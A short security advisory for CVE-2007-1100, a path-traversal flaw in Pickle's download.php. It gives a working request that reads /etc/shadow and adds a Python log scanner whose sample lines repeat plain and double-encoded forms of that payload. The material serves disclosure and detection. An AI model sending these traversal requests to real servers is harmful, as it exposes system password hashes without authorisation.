Bug: pickle download local file


Published: 2007.02.28
Credit: laurent gaffié
Risk: Medium
CWE: N/A
CVE: CVE-2007-1100
Local: No
Remote: Yes

CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: None

download local file :
/Pickle/src/download.php?img=1&file=../../../../../../../../../../../../
../etc/shadow&rotation=0&img=0

regards laurent gaffié
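
Added example, not part of the original advisory or of Pickle's code: a log check that flags requests to download.php whose file parameter is absolute or contains a ".." segment, including percent-encoded and double-encoded forms. The common-log-format input, the sample lines and the function names are assumptions made for illustration.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (common log format), for illustration only.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Feb/2007:10:00:01 +0000] "GET /Pickle/src/download.php?img=1&file=photos/cat.jpg&rotation=0 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Feb/2007:10:00:07 +0000] "GET /Pickle/src/download.php?img=1&file=../../../../etc/shadow&rotation=0&img=0 HTTP/1.1" 200 1311',
    '192.0.2.44 - - [28/Feb/2007:10:00:09 +0000] "GET /Pickle/src/download.php?file=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 200 1311',
    '192.0.2.77 - - [28/Feb/2007:10:00:12 +0000] "GET /Pickle/src/index.php?file=../x HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(file_value):
    """True if the value is absolute or contains a '..' path segment."""
    path = fully_decode(file_value).replace("\\", "/")
    return path.startswith("/") or ".." in PurePosixPath(path).parts

def suspicious_requests(lines):
    """Return (client_ip, decoded_file_value) for flagged download.php requests."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/download.php"):
            continue
        # parse_qs already decodes once; fully_decode handles further layers.
        for value in parse_qs(url.query).get("file", []):
            if is_traversal(value):
                hits.append((line.split()[0], fully_decode(value)))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(ip, value)
```

The same is_traversal test, applied before the file is opened, is the server-side check whose absence the request above relies on.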

Copyright 2014, cxsecurity.com